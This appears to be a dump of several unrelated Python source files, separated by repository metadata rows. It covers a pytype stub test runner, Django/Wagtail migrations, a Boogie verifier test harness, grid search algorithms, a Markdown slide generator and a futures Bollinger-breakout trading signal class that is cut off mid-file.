def check_subdirs_discoverable(subdir_paths: List[str]) -> None:
    """Abort with a helpful message if any expected typeshed subdir is missing."""
    for path in subdir_paths:
        if os.path.isdir(path):
            continue
        raise SystemExit("Cannot find typeshed subdir at {} (specify parent dir via --typeshed-location)".format(path))
def check_python_exes_runnable(*, python27_exe_arg: str, python36_exe_arg: str) -> None:
    """Abort unless both Python interpreters needed by pytype can be launched."""
    for exe, version_str in ((python27_exe_arg, "27"), (python36_exe_arg, "36")):
        if can_run(exe, args=["--version"]):
            continue
        formatted_version = ".".join(version_str)   # "27" -> "2.7"
        script_arg = "--python{}-exe".format(version_str)
        raise SystemExit(
            "Cannot run Python {version}. (point to a valid executable via {arg})".format(
                version=formatted_version, arg=script_arg
            )
        )
def determine_files_to_test(*, typeshed_location: str, subdir_paths: Sequence[str]) -> List[Tuple[str, int]]:
    """Determine all files to test, checking if it's in the blacklist and which Python versions to use.

    Returns a list of pairs of the file path and Python version as an int.
    """
    skipped = PathMatcher(load_blacklist(typeshed_location))
    files: List[Tuple[str, int]] = []
    for root, _, filenames in itertools.chain.from_iterable(os.walk(p) for p in subdir_paths):
        for name in sorted(n for n in filenames if n.endswith(".pyi")):
            path = os.path.join(root, name)
            if skipped.search(_get_relative(path)):
                continue
            # The directory component ("2", "3" or "2and3") decides which
            # interpreter version(s) the stub is checked under.
            if _is_version(path, "2and3"):
                versions = [2, 3]
            elif _is_version(path, "2"):
                versions = [2]
            elif _is_version(path, "3"):
                versions = [3]
            else:
                print("Unrecognized path: {}".format(path))
                versions = []
            files.extend((path, version) for version in versions)
    return files
def run_all_tests(
    *,
    files_to_test: Sequence[Tuple[str, int]],
    typeshed_location: str,
    python27_exe: str,
    python36_exe: str,
    print_stderr: bool,
    dry_run: bool
) -> None:
    """Run pytype over every (file, version) pair, print a summary, and exit
    non-zero (via SystemExit) when any stub failed to parse."""
    failures = []
    errors = 0
    total_tests = len(files_to_test)
    print("Testing files with pytype...")
    for run_number, (filename, version) in enumerate(files_to_test, start=1):
        if dry_run:
            stderr = None
        else:
            stderr = run_pytype(
                filename=filename,
                python_version="2.7" if version == 2 else "3.6",
                python_exe=python27_exe if version == 2 else python36_exe,
                typeshed_location=typeshed_location,
            )
        if stderr:
            if print_stderr:
                print(stderr)
            errors += 1
            # Keep only the final line of the traceback for the summary.
            stacktrace_final_line = stderr.rstrip().rsplit("\n", 1)[-1]
            failures.append((_get_relative(filename), stacktrace_final_line))
        if run_number % 25 == 0:
            print(" {:3d}/{:d} with {:3d} errors".format(run_number, total_tests, errors))
    print("Ran pytype with {:d} pyis, got {:d} errors.".format(total_tests, errors))
    for failed_file, last_line in failures:
        print("{}: {}".format(failed_file, last_line))
    if errors:
        raise SystemExit("\nRun again with --print-stderr to get the full stacktrace.")
if __name__ == "__main__":
    # Script entry point.
    main()
| [
"[email protected]"
]
| |
3092c08a731b61558189665e7d2e63d08603ab03 | d9eafd325ab775b7b32af2dd0b63afc7310be53d | /pfwra/home/migrations/0004_auto_20210323_0728.py | 3678a7c488fe83d6dd909f1c2f80b1f809a9fe79 | [
"MIT"
]
| permissive | johnkellehernz/pfwra | 54b0db7debaed629d6003e0826a15bde2fd4a197 | 5b8c718bb2f1aaa34e9a718e07baf270294f7ba6 | refs/heads/main | 2023-05-01T14:39:42.419993 | 2021-05-13T11:00:07 | 2021-05-13T11:00:07 | 353,514,688 | 0 | 0 | MIT | 2021-03-31T23:15:32 | 2021-03-31T23:15:31 | null | UTF-8 | Python | false | false | 1,670 | py | # Generated by Django 3.0.11 on 2021-03-23 07:28
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
    """Add HomePage.featured (a StreamField of cards) and relax the hero fields."""

    dependencies = [
        ('home', '0003_auto_20210219_0827'),
    ]

    operations = [
        # New StreamField holding "card" blocks (link, header, text, image).
        migrations.AddField(
            model_name='homepage',
            name='featured',
            field=wagtail.core.fields.StreamField([('cards', wagtail.core.blocks.StructBlock([('link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link label', required=True)), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Choose a page to link to', label='Page', required=False)), ('external_url', wagtail.core.blocks.URLBlock(help_text='Or choose an external URL to link to', label='External URL', required=False))], required=False)), ('header', wagtail.core.blocks.CharBlock(label='Header text')), ('text', wagtail.core.blocks.TextBlock(help_text='Write an introduction for the card', required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(required=False))]))], blank=True, help_text='Featured cards'),
        ),
        # Hero CTA and hero text become optional.
        migrations.AlterField(
            model_name='homepage',
            name='hero_cta',
            field=models.CharField(blank=True, help_text='Text to display on Call to Action', max_length=255, null=True, verbose_name='Hero CTA'),
        ),
        migrations.AlterField(
            model_name='homepage',
            name='hero_text',
            field=models.CharField(blank=True, help_text='Write an introduction for the homepage', max_length=255, null=True),
        ),
    ]
| [
"[email protected]"
]
| |
43b9efcb67283c12ab78d41bf4a139edda32f6a5 | 8101c599bdf68e0fcc2dbc8188640abfebc4a790 | /test/test.py | f651e500372ecdf139f269049f79c37f139d61d8 | [
"BSD-3-Clause"
]
| permissive | symbooglix/boogie-runner | 2a39ddc86d1fee8e3750db6c07f3d20363195390 | 01e1fe993d5eacf7055f1d950a209583c0405fd6 | refs/heads/master | 2021-01-21T04:37:04.636241 | 2016-04-05T16:28:27 | 2016-04-05T16:28:27 | 28,610,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,484 | py | #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import logging
import os
import pprint
import re
import shutil
import subprocess
import sys
import yaml
testDir = os.path.dirname(os.path.abspath(__file__))
repoDir = os.path.dirname(testDir)
# Hack
sys.path.insert(0, repoDir)
from BoogieRunner import ProgramListLoader
# Another Hack
sys.path.insert(0, os.path.join(repoDir, 'analysis'))
from br_util import FinalResultType, classifyResult
class RunnerTool:
    """Bundles the paths a boogie-runner invocation needs and common clean-up."""

    def __init__(self, configFile, listFile, relativePathPrefix, workDir, yamlOutput):
        self.configFile = configFile
        self.listLocation = listFile
        self.relativePathPrefix = relativePathPrefix
        self.workDir = workDir
        self.yamlOutput = yamlOutput
        # The program list must already exist on disk.
        assert os.path.exists(self.listLocation)

    def doCleanUp(self):
        # Remove the scratch directory and the YAML results file.
        shutil.rmtree(self.workDir)
        os.remove(self.yamlOutput)

    def getFileList(self):
        """Load the list of Boogie programs to test."""
        return ProgramListLoader.load(self.listLocation, self.relativePathPrefix)
class BatchRunnerTool(RunnerTool):
    """Drives boogie-batch-runner.py once over the whole program list."""

    def __init__(self, configFile, listFile, relativePathPrefix, workDir, yamlOutput):
        super(BatchRunnerTool, self).__init__(configFile, listFile, relativePathPrefix, workDir, yamlOutput)
        self.numJobs = 1

    def setNumJobs(self, count):
        assert count > 0
        self.numJobs = count

    def getResults(self, testFiles, clean=True):
        """Run the batch tool and return the parsed YAML results."""
        # Stale output would confuse the existence check below.
        if os.path.exists(self.yamlOutput):
            os.remove(self.yamlOutput)
        exitCode = subprocess.call([self.tool,
                                    "--jobs={}".format(self.numJobs),
                                    self.configFile,
                                    self.listLocation,
                                    self.workDir,
                                    self.yamlOutput
                                   ])
        if exitCode != 0:
            logging.error('Tool failed')
            sys.exit(1)
        if not os.path.exists(self.yamlOutput):
            logging.error('cannot find yaml output')
            sys.exit(1)
        with open(self.yamlOutput, 'r') as y:
            results = yaml.load(y)
        if clean:
            self.doCleanUp()
        return results

    @property
    def tool(self):
        return os.path.join(repoDir, 'boogie-batch-runner.py')
class SingleRunTool(RunnerTool):
    """Drives boogie-runner.py once per program and concatenates the YAML outputs."""

    def getResults(self, testFiles, clean=False):
        # The single-run flow always cleans up; the flag is accepted only for
        # interface compatibility with BatchRunnerTool.
        logging.warning('clean directive ignored')
        results = []
        for testFile in testFiles:
            exitCode = subprocess.call([self.tool,
                                        self.configFile,
                                        testFile,
                                        self.workDir,
                                        self.yamlOutput
                                       ])
            if exitCode != 0:
                logging.error('Tool failed')
                sys.exit(1)
            if not os.path.exists(self.yamlOutput):
                logging.error('Yaml output is missing')
                sys.exit(1)
            with open(self.yamlOutput, 'r') as f:
                results.extend(yaml.load(f))
        self.doCleanUp()
        return results

    @property
    def tool(self):
        return os.path.join(repoDir, 'boogie-runner.py')
def main(args):
    """Run the selected front end over the test programs and check each result
    against the expected classification embedded in the program's first line.

    Returns 0 on success, 1 on any configuration error or result mismatch.
    """
    logging.basicConfig(level=logging.DEBUG)
    parser = argparse.ArgumentParser()
    parser.add_argument("-j", "--jobs", type=int, default=1,
                        help='jobs to run in parallel. Only works when using batch mode')
    parser.add_argument("-k", "--keep-files", dest='keep_files',
                        action='store_true', default=False)
    parser.add_argument("-l", "--list-file", dest='list_file',
                        type=str, default="simple_boogie_programs.txt")
    parser.add_argument("config_file")
    parser.add_argument("mode", choices=['single', 'batch'], help="Front end to use. Valid options %(choices)s")
    pargs = parser.parse_args(args)

    if pargs.mode != 'batch' and pargs.jobs > 1:
        logging.error('Can only specify jobs when using "batch" mode')
        return 1

    # Compute some paths
    workDir = os.path.join(testDir, 'working_dir')
    yamlOutput = os.path.join(testDir, 'result.yml')

    if not os.path.exists(pargs.config_file):
        logging.error('Could not find config_file {}'.format(pargs.config_file))
        return 1

    listFile = os.path.join(testDir, pargs.list_file)
    if not os.path.exists(listFile):
        logging.error('Could not find list file "{}".'.format(listFile))
        return 1

    if pargs.mode == 'single':
        runnerConstructor = SingleRunTool
    elif pargs.mode == 'batch':
        runnerConstructor = BatchRunnerTool
    else:
        logging.error('Invalid mode')
        return 1

    runner = runnerConstructor(pargs.config_file, listFile, testDir, workDir, yamlOutput)
    if pargs.jobs > 1:
        runner.setNumJobs(pargs.jobs)

    if not os.path.exists(runner.tool):
        logging.error('Cannot find {}'.format(runner.tool))
        return 1

    if os.path.exists(yamlOutput):
        logging.error('Yaml output file "{}" exists. Remove it'.format(yamlOutput))
        return 1

    # Find all the tests and their expected classification.
    # Fix: the regex is loop-invariant, so compile it once outside the loop.
    expected_result_re = re.compile(r'^//\s*(\w+)')
    testFiles = {}
    for potentialTest in runner.getFileList():
        if not os.path.exists(potentialTest):
            logging.error('Could not find file "{}"'.format(potentialTest))
            return 1
        # Read expected test result from first line of file
        with open(potentialTest, 'r') as testFile:
            m = expected_result_re.match(testFile.readline())
        # Fix: compare against None with "is", not "==".
        if m is None:
            logging.error('Failed to find result on first line of file {}'.format(potentialTest))
            return 1
        expectedResultEnum = FinalResultType[m.group(1)]
        logging.info('Found test:{} - {}'.format(potentialTest, expectedResultEnum))
        testFiles[potentialTest] = expectedResultEnum

    # Run tests in a fresh working directory.
    if os.path.exists(workDir):
        logging.info('removing {}'.format(workDir))
        shutil.rmtree(workDir)
    os.mkdir(workDir)

    results = runner.getResults(testFiles, clean=not pargs.keep_files)

    # Check the results against the testFiles
    logging.info('Got results:\n{}'.format(pprint.pformat(results)))
    for result in results:
        filename = result['program']
        actualClassification = classifyResult(result)
        expectedClassification = testFiles[filename]
        if actualClassification != expectedClassification:
            logging.error('Result mismatch for {}, expected {}, got {}'.format(
                filename, expectedClassification, actualClassification))
            return 1

    logging.info('SUCCESS!')
    return 0
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit code.
    sys.exit(main(sys.argv[1:]))
| [
"[email protected]"
]
| |
814bbf98eeee530f21372492d0a0d9f8a9ce62d1 | d8f7b9943049bd483189fe58fd4abf37163866dd | /GUI Code/search.py | 9d83c91ad738a58d3a07107996a978d96e19663f | []
| no_license | NagahShinawy/python-data-structures-algorithms | d14ecd478caa13e36c4f2dcdf942e5f9e9f351e5 | c254f12dca78444e3b2bbd667d4508a699b9fb89 | refs/heads/main | 2023-05-12T17:26:23.477742 | 2021-05-10T07:08:30 | 2021-05-10T07:08:30 | 365,436,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,940 | py | """
Python Data Structures - A Game-Based Approach
Robin Andrews - https://compucademy.net/
Search Algorithms for use in GUI.
"""
import config
import heapq
import helper_functions as helpers
from collections import deque
class PriorityQueue:
    """Minimal priority queue on top of heapq; the lowest priority value pops first."""

    def __init__(self):
        self.elements = []

    def is_empty(self):
        return not self.elements

    def put(self, item, priority):
        # Store (priority, item) so the heap orders by priority.
        heapq.heappush(self.elements, (priority, item))

    def get(self):
        """Remove and return the item with the smallest priority."""
        _priority, item = heapq.heappop(self.elements)
        return item
def dfs(board, start, goal):
    """Depth-first search from start to goal on a grid board.

    Returns the list of cells in the order they were expanded (ending at
    goal), or None when goal is unreachable.
    """
    stack = [start]
    # Fix: mark the start cell visited immediately, otherwise it can be
    # re-pushed (and re-expanded) when it is a neighbour of a later cell.
    visited = {start}
    full_path = []
    while stack:
        current = stack.pop()
        full_path.append(current)
        if current == goal:
            return full_path
        for direction in ["up", "right", "down", "left"]:  # Other orders are fine too.
            row_offset, col_offset = config.offsets[direction]
            neighbour = (current[0] + row_offset, current[1] + col_offset)
            if helpers.is_legal_pos(board, neighbour) and neighbour not in visited:
                stack.append(neighbour)
                visited.add(neighbour)
    return None  # goal unreachable
def bfs(board, start, goal):
    """Breadth-first search from start to goal on a grid board.

    Returns the list of cells in the order they were expanded (ending at
    goal), or None when goal is unreachable.
    """
    queue = deque([start])
    # Fix: mark the start cell visited immediately, otherwise it can be
    # re-enqueued when it is a neighbour of a later cell.
    visited = {start}
    full_path = []
    while queue:
        current = queue.popleft()
        full_path.append(current)
        if current == goal:
            return full_path
        for direction in ["up", "right", "down", "left"]:
            row_offset, col_offset = config.offsets[direction]
            neighbour = (current[0] + row_offset, current[1] + col_offset)
            if helpers.is_legal_pos(board, neighbour) and neighbour not in visited:
                queue.append(neighbour)
                visited.add(neighbour)
    return None  # goal unreachable
def heuristic(a, b):
    """Manhattan distance between grid cells a and b."""
    row_a, col_a = a
    row_b, col_b = b
    return abs(row_a - row_b) + abs(col_a - col_b)
def a_star(board, start_pos, goal_pos):
    """A* search with Manhattan heuristic on a grid board.

    Returns the list of cells in expansion order (ending at goal_pos), or
    None when the goal is unreachable.
    """
    frontier = PriorityQueue()
    frontier.put(start_pos, 0)
    g_values = {start_pos: 0}   # cheapest known cost from start to each cell
    full_path = []
    while not frontier.is_empty():
        current = frontier.get()
        full_path.append(current)
        if current == goal_pos:
            return full_path
        for direction in ["up", "right", "down", "left"]:
            row_offset, col_offset = config.offsets[direction]
            neighbour = (current[0] + row_offset, current[1] + col_offset)
            new_cost = g_values[current] + 1  # Would be edge weight in a weighted graph
            if helpers.is_legal_pos(board, neighbour):
                # Second check only applies to weighted graph.
                if neighbour not in g_values or new_cost < g_values[neighbour]:
                    g_values[neighbour] = new_cost
                    f_value = new_cost + heuristic(goal_pos, neighbour)
                    frontier.put(neighbour, f_value)
    return None
| [
"[email protected]"
]
| |
4dee0daf77fa48f37448dd8cf7d857f94c9426d5 | e91ba13a71dc8757e4c6f483d300bb32db8947d4 | /kubernetes-mastery/slides/markmaker.py | d7ef7a0356e368ba4cf696f9414f7f69f63ba6cc | [
"Apache-2.0"
]
| permissive | sijoonlee/kubernetes_study | 752788d4ecf542072436e13ad98b9c67c3b3db2c | 668abacf4f855b55f23562486e420d29397bbe6d | refs/heads/master | 2022-12-22T06:52:51.224364 | 2020-09-30T17:38:18 | 2020-09-30T17:38:18 | 276,719,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,687 | py | #!/usr/bin/env python
# transforms a YAML manifest into a HTML workshop file
import glob
import logging
import os
import re
import string
import subprocess
import sys
import yaml
logging.basicConfig(level=os.environ.get("LOG_LEVEL", "INFO"))
class InvalidChapter(ValueError):
    """Raised when a chapter spec is neither markdown, a file path, nor a list."""

    def __init__(self, chapter):
        ValueError.__init__(self, "Invalid chapter: {!r}".format(chapter))
def anchor(title):
    """Turn a slide title into a TOC anchor name (letters and dashes only)."""
    slug = title.lower().replace(' ', '-')
    slug = ''.join(ch for ch in slug if ch in string.ascii_letters + '-')
    return "toc-" + slug
def interstitials_generator():
    """Cycle forever over the non-blank image URLs listed in interstitials.txt.

    The file is read lazily, on the first next() call.
    """
    # Fix: close the file handle once the URLs are read (the original left it open).
    with open("interstitials.txt") as urls_file:
        images = [line.strip() for line in urls_file if line.strip()]
    while True:
        for image in images:
            yield image
interstitials = interstitials_generator()
def insertslide(markdown, title):
    """Insert an interstitial picture slide plus an auto-generated title slide
    just before the section whose H1 heading is *title*.

    Relies on the module-level title2path / all_titles maps filled by gentoc().
    """
    title_position = markdown.find("\n# {}\n".format(title))
    # Back up to the slide separator that precedes the section heading.
    slide_position = markdown.rfind("\n---\n", 0, title_position + 1)
    logging.debug("Inserting title slide at position {}: {}".format(slide_position, title))
    before = markdown[:slide_position]
    toclink = "toc-chapter-{}".format(title2path[title][0])
    # Pad the title list so every section has a previous/next neighbour.
    _titles_ = [""] + all_titles + [""]
    currentindex = _titles_.index(title)
    previouslink = anchor(_titles_[currentindex - 1])
    nextlink = anchor(_titles_[currentindex + 1])
    interstitial = interstitials.next()
    # Fix: the {interstitial} placeholder was missing from the template, so the
    # image URL pulled from interstitials.txt was computed but never rendered.
    extra_slide = """
---

class: pic

.interstitial[]

---

name: {anchor}
class: title

{title}

.nav[
[Previous section](#{previouslink})
|
[Back to table of contents](#{toclink})
|
[Next section](#{nextlink})
]

.debug[(automatically generated title slide)]
""".format(anchor=anchor(title), interstitial=interstitial, title=title, toclink=toclink, previouslink=previouslink, nextlink=nextlink)
    after = markdown[slide_position:]
    return before + extra_slide + after
def flatten(titles):
    """Yield every title from an arbitrarily nested list of titles, in order.

    (Python 2 file, so no "yield from".)
    """
    for item in titles:
        if not isinstance(item, list):
            yield item
        else:
            for nested in flatten(item):
                yield nested
def generatefromyaml(manifest, filename):
    """Render a YAML workshop manifest into the final HTML slide deck."""
    manifest = yaml.load(manifest)
    markdown, titles = processchapter(manifest["chapters"], filename)
    logging.debug("Found {} titles.".format(len(titles)))
    # Build the table of contents and the per-section title slides.
    markdown = markdown.replace("@@TOC@@", gentoc(titles))
    for title in flatten(titles):
        markdown = insertslide(markdown, title)
    exclude = manifest.get("exclude", [])
    logging.debug("exclude={!r}".format(exclude))
    if not exclude:
        logging.warning("'exclude' is empty.")
    exclude = ",".join('"{}"'.format(c) for c in exclude)
    # Insert build info. This is super hackish.
    markdown = markdown.replace(
        ".debug[",
        ".debug[\n```\n{}\n```\n\nThese slides have been built from commit: {}\n\n".format(dirtyfiles, commit),
        1)
    markdown = markdown.replace("@@TITLE@@", manifest["title"].replace("\n", "<br/>"))
    # Splice everything into the HTML shell.
    html = open("workshop.html").read()
    html = html.replace("@@MARKDOWN@@", markdown)
    html = html.replace("@@EXCLUDE@@", exclude)
    html = html.replace("@@CHAT@@", manifest["chat"])
    html = html.replace("@@TITLE@@", manifest["title"].replace("\n", " "))
    return html
# Maps a section title (the string just after "^# ") to its position
# in the table of content (as a (chapter,part,subpart,...) tuple).
title2path = {}
path2title = {}
all_titles = []
# "tree" is a list of titles, potentially nested.
def gentoc(tree, path=()):
    """Recursively render the table of contents for a nested title tree.

    Side effect: records every title's TOC position in the module-level
    title2path / path2title / all_titles structures.
    """
    if not tree:
        return ""
    if isinstance(tree, str):
        title = tree
        title2path[title] = path
        path2title[path] = title
        all_titles.append(title)
        logging.debug("Path {} Title {}".format(path, title))
        return "- [{}](#{})".format(title, anchor(title))
    if isinstance(tree, list):
        subtocs = [gentoc(subtree, path + (i + 1,)) for i, subtree in enumerate(tree)]
        depth = len(path)
        if depth == 0:
            # Top level: one TOC slide per chapter.
            return "\n---\n".join(subtocs)
        if depth == 1:
            chapterslide = "name: toc-chapter-{n}\n\n## Chapter {n}\n\n".format(n=path[0])
            chapterslide += "".join(subtoc + "\n\n" for subtoc in subtocs)
            chapterslide += ".debug[(auto-generated TOC)]"
            return chapterslide
        return "\n\n".join(subtocs)
# Arguments:
# - `chapter` is a string; if it has multiple lines, it will be used as
# a markdown fragment; otherwise it will be considered as a file name
# to be recursively loaded and parsed
# - `filename` is the name of the file that we're currently processing
# (to generate inline comments to facilitate edition)
# Returns: (epxandedmarkdown,[list of titles])
# The list of titles can be nested.
def processchapter(chapter, filename):
    """Expand a chapter spec into (markdown, titles).

    A chapter is either inline markdown (multi-line string), the name of a
    markdown file to load, or a list of chapters; anything else is rejected.
    *filename* is the file currently being processed (used for debug footers).
    """
    if isinstance(chapter, unicode):
        return processchapter(chapter.encode("utf-8"), filename)
    if isinstance(chapter, str):
        if "\n" in chapter:
            # Inline markdown: harvest section titles and stamp a debug
            # footer onto every slide.
            titles = re.findall("^# (.*)", chapter, re.MULTILINE)
            slidefooter = ".debug[{}]".format(makelink(filename))
            chapter = chapter.replace("\n---\n", "\n{}\n---\n".format(slidefooter))
            chapter += "\n" + slidefooter
            return (chapter, titles)
        if os.path.isfile(chapter):
            # A file name: load it and process its contents.
            return processchapter(open(chapter).read(), chapter)
    if isinstance(chapter, list):
        chapters = [processchapter(subchapter, filename) for subchapter in chapter]
        markdown = "\n---\n".join(markdown for (markdown, _) in chapters)
        titles = [titles for (_, titles) in chapters if titles]
        return (markdown, titles)
    raise InvalidChapter(chapter)
# Try to figure out the URL of the repo on GitHub.
# This is used to generate "edit me on GitHub"-style links.
try:
    if "REPOSITORY_URL" in os.environ:
        repo = os.environ["REPOSITORY_URL"]
    else:
        repo = subprocess.check_output(["git", "config", "remote.origin.url"])
        # Convert an SSH remote into a browsable https URL.
        repo = repo.strip().replace("git@github.com:", "https://github.com/")
    if "BRANCH" in os.environ:
        branch = os.environ["BRANCH"]
    else:
        branch = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"])
        branch = branch.strip()
    base = subprocess.check_output(["git", "rev-parse", "--show-prefix"])
    base = base.strip().strip("/")
    # Fix: restore the {filename} placeholder (re-injected as "{}" so that
    # makelink() can format the final path into the template later).
    urltemplate = ("{repo}/tree/{branch}/{base}/{filename}"
                   .format(repo=repo, branch=branch, base=base, filename="{}"))
# Fix: narrow the bare excepts to Exception so KeyboardInterrupt/SystemExit
# are not swallowed during module import.
except Exception:
    logging.exception("Could not generate repository URL; generating local URLs instead.")
    urltemplate = "file://{pwd}/{filename}".format(pwd=os.environ["PWD"], filename="{}")

try:
    commit = subprocess.check_output(["git", "rev-parse", "--short", "HEAD"])
except Exception:
    logging.exception("Could not figure out HEAD commit.")
    commit = "??????"

try:
    dirtyfiles = subprocess.check_output(["git", "status", "--porcelain"])
except Exception:
    logging.exception("Could not figure out repository cleanliness.")
    dirtyfiles = "?? git status --porcelain failed"
def makelink(filename):
    """Render *filename* as a markdown link into the repo when it exists on disk;
    otherwise return it unchanged."""
    if not os.path.isfile(filename):
        return filename
    return "[{}]({})".format(filename, urltemplate.format(filename))
if len(sys.argv) != 2:
    logging.error("This program takes one and only one argument: the YAML file to process.")
else:
    filename = sys.argv[1]
    if filename == "-":
        # Read the manifest from standard input.
        filename = "<stdin>"
        manifest = sys.stdin
    else:
        manifest = open(filename)
    logging.info("Processing {}...".format(filename))
    sys.stdout.write(generatefromyaml(manifest, filename))
    logging.info("Processed {}.".format(filename))
| [
"[email protected]"
]
| |
0c78396cacf3dcb777ca52b8bb646c14114b8fd8 | b323fe5968aea700322428ba6bd239b45bc88c00 | /sohpen/website/migrations/0004_auto_20170518_0707.py | 9cbdfebe44d099d22afdb59741aada8fb2fc3ec3 | []
| no_license | aakashres/sophen | a1862be0fe4aaac51a03f111c1943c1e44f517cb | d84b8e8640f10eef22a79b8afba3e226405f9e5d | refs/heads/master | 2022-11-08T01:46:05.697691 | 2017-11-06T11:10:22 | 2017-11-06T11:10:22 | 273,651,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 07:07
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Make Menu.parent optional (blank/null self-referential foreign key)."""

    dependencies = [
        ('website', '0003_auto_20170518_0544'),
    ]

    operations = [
        migrations.AlterField(
            model_name='menu',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='website.Menu'),
        ),
    ]
| [
"[email protected]"
]
| |
582d8df350455a0ac4ead2662303513df51bc4e8 | 9dfc5bf5d286c7b7f13ce4c17a8def1eb829d2b4 | /engine/fut/engine/fut_strategyAberration_1.py | 148503356e2de5a64ce79e517a46464f60ac4fbf | []
| no_license | chenzhenhu-yeah/nature | a463058fb4cc600fbcbd6a41edb7df485008aad6 | 368f52181f1ac7c0c8b06623c15faf77b7fc5e36 | refs/heads/master | 2021-06-24T10:20:03.796435 | 2021-01-16T06:40:31 | 2021-01-16T06:40:31 | 193,628,719 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 14,747 | py | # encoding: UTF-8
import os
import pandas as pd
from csv import DictReader
from collections import OrderedDict, defaultdict
from nature import to_log, get_dss, get_contract
from nature import DIRECTION_LONG,DIRECTION_SHORT,OFFSET_OPEN,OFFSET_CLOSE,OFFSET_CLOSETODAY,OFFSET_CLOSEYESTERDAY
from nature import ArrayManager, Signal, Portfolio, TradeData, SignalResult
########################################################################
class Fut_AberrationSignal_Duo(Signal):
#----------------------------------------------------------------------
def __init__(self, portfolio, vtSymbol):
self.type = 'duo'
# 策略参数
self.bollWindow = 80 # 布林通道窗口数
self.bollDev = 2 # 布林通道的偏差
self.fixedSize = 1 # 每次交易的数量
self.initBars = 90 # 初始化数据所用的天数
self.minx = 'min5'
# 策略临时变量
self.bollUp = 0 # 布林通道上轨
self.bollDown = 0 # 布林通道下轨
# 需要持久化保存的变量
self.stop = 0 # 多头止损
Signal.__init__(self, portfolio, vtSymbol)
#----------------------------------------------------------------------
def load_param(self):
filename = get_dss() + 'fut/cfg/signal_aberration_'+self.type+'_param.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[ df.pz == get_contract(self.vtSymbol).pz ]
if len(df) > 0:
rec = df.iloc[0,:]
self.bollWindow = rec.bollWindow
self.bollDev = rec.bollDev
print('成功加载策略参数', self.bollWindow, self.bollDev)
#----------------------------------------------------------------------
def set_param(self, param_dict):
if 'bollWindow' in param_dict:
self.bollWindow = param_dict['bollWindow']
print('成功设置策略参数 self.bollWindow: ',self.bollWindow)
if 'bollDev' in param_dict:
self.bollDev = param_dict['bollDev']
print('成功设置策略参数 self.bollDev: ',self.bollDev)
#----------------------------------------------------------------------
def onBar(self, bar, minx='min5'):
"""新推送过来一个bar,进行处理"""
self.bar = bar
if minx == 'min1':
self.on_bar_min1(bar)
else:
self.on_bar_minx(bar)
# r = [[minx,bar.date,bar.time,bar.open,bar.close]]
# df = pd.DataFrame(r)
# filename = get_dss() + 'fut/check/bar_' + self.vtSymbol + '.csv'
# df.to_csv(filename, index=False, mode='a', header=False)
def on_bar_min1(self, bar):
pass
def on_bar_minx(self, bar):
self.am.updateBar(bar)
if not self.am.inited:
return
#print('here')
self.calculateIndicator() # 计算指标
self.generateSignal(bar) # 触发信号,产生交易指令
#----------------------------------------------------------------------
def calculateIndicator(self):
"""计算技术指标"""
self.bollUp, self.bollDown = self.am.boll(self.bollWindow, self.bollDev)
self.stop = (self.bollUp + self.bollDown)/2
#----------------------------------------------------------------------
def generateSignal(self, bar):
# 当前无仓位
if self.unit == 0:
if bar.close > self.bollUp:
self.buy(bar.close, self.fixedSize)
# 持有多头仓位
elif self.unit > 0:
if bar.close < self.stop:
self.sell(bar.close, abs(self.unit))
#----------------------------------------------------------------------
def load_var(self):
filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[df.vtSymbol == self.vtSymbol]
if len(df) > 0:
rec = df.iloc[-1,:] # 取最近日期的记录
self.unit = rec.unit
if rec.has_result == 1:
self.result = SignalResult()
self.result.unit = rec.result_unit
self.result.entry = rec.result_entry
self.result.exit = rec.result_exit
self.result.pnl = rec.result_pnl
#----------------------------------------------------------------------
def save_var(self):
    """Append the current signal state to the shared var file."""
    date = self.portfolio.result.date
    if self.result is None:
        row = [date, self.vtSymbol, self.unit, 0, 0, 0, 0, 0]
    else:
        row = [date, self.vtSymbol, self.unit, 1,
               self.result.unit, self.result.entry, self.result.exit, self.result.pnl]
    columns = ['datetime', 'vtSymbol', 'unit',
               'has_result', 'result_unit', 'result_entry', 'result_exit', 'result_pnl']
    df = pd.DataFrame([row], columns=columns)
    filename = get_dss() + 'fut/check/signal_aberration_' + self.type + '_var.csv'
    # Append-only, no header: the file accumulates one row per save.
    df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def open(self, price, change):
    """Open (or add to) a position and append the fill to the deal log."""
    self.unit += change
    if not self.result:
        self.result = SignalResult()
    self.result.open(price, change)

    direction = '多' if change > 0 else '空'
    row = [[self.bar.date + ' ' + self.bar.time, direction, '开', abs(change), price, 0]]
    df = pd.DataFrame(row, columns=['datetime', 'direction', 'offset', 'volume', 'price', 'pnl'])
    filename = get_dss() + 'fut/deal/signal_aberration_' + self.type + '_' + self.vtSymbol + '.csv'
    df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def close(self, price):
    """Close the whole position, log the fill with its realized pnl,
    then clear the open-result record."""
    self.unit = 0
    self.result.close(price)

    row = [[self.bar.date + ' ' + self.bar.time, '', '平', 0, price, self.result.pnl]]
    df = pd.DataFrame(row, columns=['datetime', 'direction', 'offset', 'volume', 'price', 'pnl'])
    filename = get_dss() + 'fut/deal/signal_aberration_' + self.type + '_' + self.vtSymbol + '.csv'
    df.to_csv(filename, index=False, mode='a', header=False)

    self.result = None
########################################################################
class Fut_AberrationSignal_Kong(Signal):
